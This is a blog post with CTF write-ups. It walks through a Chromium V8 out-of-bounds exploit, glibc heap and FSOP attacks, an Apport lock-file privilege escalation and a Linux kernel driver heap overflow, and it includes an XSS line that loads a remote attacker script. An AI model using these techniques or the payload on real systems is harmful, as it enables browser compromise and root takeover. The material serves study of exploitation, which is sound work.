Search This Blog

Saturday, January 16, 2021

Rope2 HackTheBox Writeup (Chromium V8, FSOP + glibc heap, Linux Kernel heap pwnable)

Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.

Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.

Initial enumeration is quite obvious. An nmap scan shows port 22, 5000, and 8000 open. On port 5000, it is a gitlab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred), you can see chromium source code, with a patch by the challenge author. Use the gitlab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970

On port 8000, there is a website that allows us to submit a contact form. Since the gitlab makes it clear that this is a V8 pwnable, XSS would be an obvious vector. Testing something like <script src=http://10.10.14.9/exploit.js></script> showed a response on my local SimpleHTTPServer. Clearly, our path is to use the browser pwnable to write javascript code to gain RCE, from which we can trigger over the XSS.

Finding the bug is extremely easy. Take a look at the changed files in commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new function added in builtin-arrays.cc. 

In ArrayGetLastElement, it is returning the value of the array at array[len], which is an OOB read. in ArraySetLastElement, it expects two arguments. The first argument will be the “this” argument and the second argument is the value, which the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory saving decision; rather than storing 64 bit pointers on the heap, most of the pointers will be treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) is stored in the r13 register.

As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.


typer.cc and bootstrapper.cc tells us that we can access these functions from builtin arrays with GetLastElement and SetLastElement.

For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts as well; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium Depot tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).

Before I start, I highly recommend you to check out Faith's writeup or the famous Phrack paper, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.

In V8 heap, there are three main types: smi, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smi are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running debug d8 with --allow-natives-syntax option).  One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).

For every V8 object, there are several important pieces of data. Map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as object size, element types, and prototype pointer is stored in the Map. The following is a list of element types (V8 currently has 21), but V8 mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which point to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional additional length field as well (lengths are represented as an smi). 

Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):


Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.

There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic types of primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you just create a type confusion of an object array into a double array, so its elements, which are pointers, get outputted as such. The other main type of primitive is the fakeobj primitive, where as the name implies, fake objects in memory. As Faith discusses again, this can be achieved by just creating another type confusion of a double array into an object array, and writing pointers into the elements.

Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making it think its a double array). We can now manipulate the index which acts as the element pointer to be a valid address, and have it read its content from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.

At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about it here as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly Instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At the Instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported Web Assembly function will now execute such shellcode. One might wonder why such an advanced software would be using rwx page. Apparently, V8 devs pinpoint the issue on asm.js, which requires lazy compilation into Web Assembly, and the constant permission flips impact performance a lot.

However, how can you  write into 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, ArrayBuffer's backing store still store the 64 bits in entirety as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator) as you can see in the image below.


If you change the backing store, you can now write to that arbitrary 64 bit address location (like in your WASM instance) with a DataView object initalized over your ArrayBuffer, since ArrayBuffer are low level raw binary buffers and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with its contents. You can also perhaps find a stable way to leak a libc address as they do exist in the V8 heap (and V8 heap behaves predictably), and then choose to overwrite a hook function to another function or a stack pivot; do note that this success rate would work better inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, but I believe glibc's allocator is still occasionally utilized).

Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't exactly be as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecasted as 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while also retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access size n+1 from the FixedDoubleArray, which will be treated as the 2n+1 object array index.

For example, if I declare a size 2 array of objects called temp, the following behavior occurs:

convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
While this won't allow for a direct map overwrite and type confusion, but we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's element pointer with OOB read. This way, when we perform an oob write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which would overwrite both its own properties and elements pointer. We can replace its elements pointer with the elements pointer of the second array, and just wipe out properties pointer since it won't matter for arrays that much. Now, when we try to OOB write on the first array, it will still see it as size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again doesn't matter, and you can just replace the map with the leaked double map from the OOB read. Now indexing into this second array will leak the target object's address.

The same concept is applied to fakeobj. However, this time we aren't changing the map of the second larger object array. Rather, we want to grab it's map's value. Once we have that, we can normally OOB the float array and change it's map to an object array's map, and retrieve fake objects. Here is my implementation:


Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for elements as well as the size (just to choose any valid smi that's greater than or equal to size 1). I also subtracted another -0x8 from the address for the elements location, since pointer compression puts both the element's map and size in one single qword. Properties once again doesn't really matter, but the double array OOB leak handled it for us regardless so I just left it as that. As a setup for my WASM Instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.


And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode.

Here is my final exploit (note that it isn't 100%, probably due to some advanced garbage collector behavior or some other V8 internals that I dont' understand):


Now we popped a shell as chrome user. 

From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.

At this point during the release, only 3 players have popped a shell, and all of us were working towards users. This is when the A Team, per tradition, found an unintended route, and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know R4J and the A Team for their example crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege esclataion (after which will be run as root on the next ssh connection):


 Apparently several other boxes were vulnerable to the same bug... 

For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.

Reversing the binary comes up with the following pseudocode:


Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file spots, and you cannot have the same filenames (adding, removing, and editing are all done selectively by the filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows and etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to glibc source, realloc is as the following (__libc_realloc calls _int_realloc):


If the older chunk size is larger or equal to the requested chunk size, the chunk at that same memory location remains the same and it will attempt to split it. If it's large enough to be split into its own chunk, it'll get set up properly for it to be freed. Nothing would happen if you request a realloc() of the same size. By __libc_realloc, if the requested size is 0, then it just frees it and returns 0 (but that 0 is stored in a temporary value and by the program logic, won't replace the file content pointer).

If the older chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to wilderness, it will also try to extend to the next free chunk if possible and then deal with the split for remainder later (as when the older chunk size is larger or equal to the requested chunk size). Its last choice is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge. 

It only checks if size is less than or equal to 0x70. If we were to tell it to realloc a size of 0, we can make basically make it become a free. Without that check (and the fact that the pointer remains there), we can use this to emulate a double free; this is the central bug.

But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and main arena only differs in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, and there is only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of the libc itself during runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.

This is actually a really common technique, as detailed in HITCON baby tcache challenge. The linked writeup gives a much better explanation, but the gist is that puts calls _IO_new_file_xsputn, which will call _IO_new_file_overflow. Page 16 of the famous AngelBoy FSOP paper also discusses this technique.


Our end goal is to have this file structure path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals, and have our ch argument be EOF. The second argument is already set correctly from the call from _IO_new_file_xputn. To skip the first two conditions, we need to make sure to set the  _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flag field of the file structure. The following is _IO_do_write:


To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure _flag field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base. 

To summarize, based on libio.h, we can set the flag as the following: _IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING | ~_IO_NO_WRITE. The value for the _flags field should be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_base, and read_end to null. And now, we can use a single byte to tamper with write_base, and hence have the syscall write dump memory for us.

I will now discuss the exploit itself below. A really high level of understanding of the glibc heap behavior is a must know before reading. A lot of what I do is based on heap intuition and heap feng shui as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).

The first thing I did was store some chunks into the 0x60 and 0x80 tcachebins for usage after the leak. This is for when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user sized tcache chunk, filled it with 0x71 (for fake size metadata for later, this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).


Here is the current heap state:

Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). then I started pulling back from the 0x60 user sized tcache, and changed the fd pointer to redirect me into region of 0x......370 later on in the diagram above.



On my next allocation from the 0x70 tcache, I will still have the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real sized chunk (0x20 chunk will be sent into tcache). I then fake edited the 0x50 chunk, then split the chunk into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? Well, it is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370  location.



Remember now, that our current file content (size of 0x70), and the first item on the freelist for the 0x20 and 0x50 tcache freelist all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of current file content at 0x......390  to 0x91 (so once we fill the tcache of 0x90, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key structure in the “0x90” sized chunk to bypass the tcache double free mitigation, which I performed from the chunk allocated above as edit restricts us to not go over size of 0x70. 



Now we can overlap tcache bins with unsorted bins to help with a tcache bin with a 1/16 bit brute to write onto the _IO_2_1_stdout_ file structure. Here is where having different tcache bins of different size point to different locations become useful. If we just double freed the same chunk, then we can't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). Now, with my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure now. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses as the brute only worked locally. The code below will be the one adjusted for remote work, while the image will show the original local one without ASLR.



However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.

Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as unsorted bin is now corrupted). I then fake edited it, and then split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I can get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.



After this point, we can free our chunk once again to get space for a new allocation. I can get the location of __free_hook - 8 back by allocating from 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then it's just overwrite it with /bin/sh\x00 and address of system, and a subsequent free call from pop a shell.

Here is the final remote exploit:


Finally, we pop shell as R4J (remote 1/16 takes a few minutes):

However, we still weren't able to read the flag. It turns out that our group permissions were incorrect as we were still chromeuser group, but this is relatively trivial. newgrp - r4j will change our gid correctly, and we can grab the user flag.

Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
run dmesg
[   20.879368] ralloc: loading out-of-tree module taints kernel.
[   20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel

This will probably be the vulnerable driver. Looking in /dev, there was a ralloc device loaded. The driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the current protections. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice to disable KPTI and SMAP (although KPTI was originally enabled during testing, perhaps HackTheBox was running their servers on AMD Epyc and the whole issue KPTI was designed to address, Meltdown, wasn't an issue for AMD). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.

Reversing the kernel module comes up with the following pseudocode:


The bug is pretty clear here. When allocating from the ralloc ioctl, the size set in the global array for each entry is added to 0x20. This way, when you edit, you have a large kernel heap overflow. Deleting and reading are safe.

In order to even be able to debug this pwn efficiently, I had to use qemu so I can integrate it with peda remote debugging. I also must enable kvm, so I won't be stuck waiting 5 minutes for it to even boot. To set this up, I downloaded the 19.04 Ubuntu Server image, ensured the the kernel version was the same (5.0.0.38 from enumeration). I then set up an image drive for this specifically for an install with the following commands:

qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm

Then, to boot this kernel, I had to set the following flags:


I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” into /etc/default/grub, ran grub-update, loaded ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment for which we can hook peda onto. It would also be helpful to retrieve the System Map file as well as vmlinuz..

With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this usage; it can give both a KASLR leak via ptm_unix98_ops and rip control with its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly discuss some protections in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even if we don't get a heap leak, there is chance to overwrite and corrupt it with only an 8 byte overflow to get it to redirect properly (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, there were even more pointer hardening options added soon afterwards in later kernel versions). Another hardening option is freelist randomization, which as the name implies, randomizes the freelist. This means our heap operations won't be predictable like in glibc, so a heap spray will be necessary.

One of the first things in my kernel exploit are the helper functions and structs. I made the following:


As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to source, the struct is as the following:


Therefore, the 4th qword of this holds the tty_operations struct pointer, which for ptmx devices, will contain the address of ptm_unix98_ops. According to the Ubuntu System-Image file, that address will have its lower 12 bits be 6a0; this will come in handy for the heap spray. From the source, the following is the tty_operations struct:


Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd. 

For the spray, my plan was to just allocate a bunch of ptmx devices, and then loop through the array of 32 spots to allocate a ralloc chunk. After each allocation, I would check if it is adjacent to a ptmx device by performing an OOB read to see if there is a ptm_unix98_ops address (we have just enough of an OOB amount to hit that field of the structure). If that is the correct one, I will just return that index. Here is my implementation:


From there, we can rebase all the necessary addresses in the kernel we need for privilege escalation to uid 0.


Now we can replace the tty_operations struct pointer with our own malicious pointer with the OOB write. Take careful note to preserve the other addresses in this struct. I also spammed my malicious tty_operations struct with pty_close to prevent other crashes (it just helps fill it with valid pointers, and crashing won't really happen since ioctl is the only operation I am planning for it). I chose a stack pivot gadget that was xchg eax, esp (since the address of the function pointer will be in the rax register when I trigger the malicious ioctl). This also allows me to determine an absolute location to make my fake stack for the rop chain.


Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):

As you can see, there is a userland pointer that replaced the tty_operations struct pointer.

Now what should my rop chain be like? There is only SMEP, so this should be quite trivial with a ret2usr or even without it. However, the one issue I kept running into was the inability to use certain syscalls upon the return to usermode (such as execve), and I do not enjoy having an exploit that doesn't give me an ability to pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there is something I didn't clean up with the corruption created with the exploit, but I am not completely sure. In the end, I decided to just make my exploit make /usr/bin/dash a suid binary as root and then hang the kernel thread (for 49.7 days, which is long enough). The idea was to just run the following pseudocode:


Once we added that the rop chain into the target location after the stack pivot, we can trigger the malicious rop chain and become root. While we don't know which ptmx fd is the adjacent chunk, we can just loop through all of them, and run ioctl on all of them. Note that this exploit has to be run asynchronously in bash due to the hanging.

The following is the final exploit:


And after compiling and transfering to remote... (note that you can access this driver as chromeuser as well):


Whew, and finally, we can obtain the root flag! It was a really fun journey, and definitely sparked my interest in learning more about kernel pwning (as my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (as this is quite a complex writeup), and I am 100% looking forwards to Rope3.

Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17, and Overthink for giving this a read through and providing feedback to make the writeup even better.


Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it only had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for controlled arb write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop. 

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 


He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct everytime you call malloc :(


The delete function is safe and nulls out the size and chunk array indices respectively.


The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes the number of bytes based on strlen(data), so if we want to use this for leaks, we have to be very careful to not introduce null bytes before the leak.


And here, we have a classic CTF heap note bug... the infamous null byte poisoning, as it adds a null byte one after the amount read in. Note that this function can only be used once, unless you reset the sanity value, but it wasn't necessary in this exploit.

The last thing to take note of is the libc leak for unsorted bin fd and bk pointers end with a null byte in this libc, which will prove slightly troublesome later on.

Observations:

From the reversing above, we can conclude several things and propose a basic exploit path.

Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heapleak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint_8 to store tcache counts; it now uses uint_16. Hence, if we can place chunks in around the 0x1420ish range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (and the pointer as well). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and to bypass the wipe.

Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 tcache bins filled and then 2 smallbins, so you can pull out one smallbin and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.

Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out to bad when writing this exploit as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend closely following around with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.

To start off, I wrote some helper functions:

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted. A chunk larger than all three were requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the one of the middle size has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check. 

Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.

Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).

Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range). 

Now we want to recover the the 0x440 chunk in unsorted, write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it so the pointers are preserved. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.

Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.

A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.

